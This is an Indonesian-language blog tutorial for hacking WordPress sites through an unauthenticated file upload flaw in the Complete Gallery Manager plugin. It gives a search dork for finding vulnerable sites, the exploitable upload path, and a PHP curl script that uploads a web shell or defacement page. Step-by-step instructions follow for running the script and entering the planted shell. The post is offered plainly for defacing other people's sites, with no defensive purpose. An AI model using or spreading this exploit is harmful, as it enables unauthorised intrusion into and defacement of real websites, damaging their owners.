kali ini Nue akan share Exploit WP Complete Galleri File Upload, ett,, ini exploit lama loh ..
hahaha iseng2 aja share kali aja masih
bahan bahan:
- PC yang tersambung dengan Internet
- Xampp
- Shell & Script Deface
- Kopi , sabun , Lilin (hukumnya sunah wkwkw :v )
langsung aja intip tutornya
- dork : allinurl:/wp-content/plugins/complete-gallery-manager/frames
(kembangin lagi vroh, biar dapet yg vuln and verawan)
- exploit : /wp-content/plugins/complete-gallery-manager/frames/upload-images.php
- vuln: "error no file were uploaded"
<?php*shell.php ~> ganti dgn nama shell sobat, bisa juga ganti dgn nama script depes sobat
$uploadfile="shell.php";
$ch = curl_init("http://target.coli/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
*target.co.li ~> ganti dengan link target milik sobat yang vuln tadi
*lalu save dgn ekstensi php (contoh.php) dan taruh ke letak C:/xampp/php bersama dgn shell sobat, & script depes sobat *(kalo yang mau langsung upload script depes..)
- Buka Xampp , dan nyalakan Apache , dan MySQL , lalu klik Shell
- Lalu Ketikan :
cd C:/xampp/php
php namasourcecodephpsobat.php
- Jika Berhasil Upload,, akan muncul "success",true," (beserta nama file sekaligus letak Shell/script depes sobat)
- langsung aja cek dan masuk ke shell kesayangan sobat
atau yang langsung upload script depes , juga sama
Hahahaha Sekian tutorial kali ini.
bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Sekian dan semoga bermanfaat .. terimakasih
source and thanks to: Malay-Indo Black Hat
./Nuenomaru
Nuenomaru just an illusion in Cyber World
Visit and follow :
EmoticonEmoticon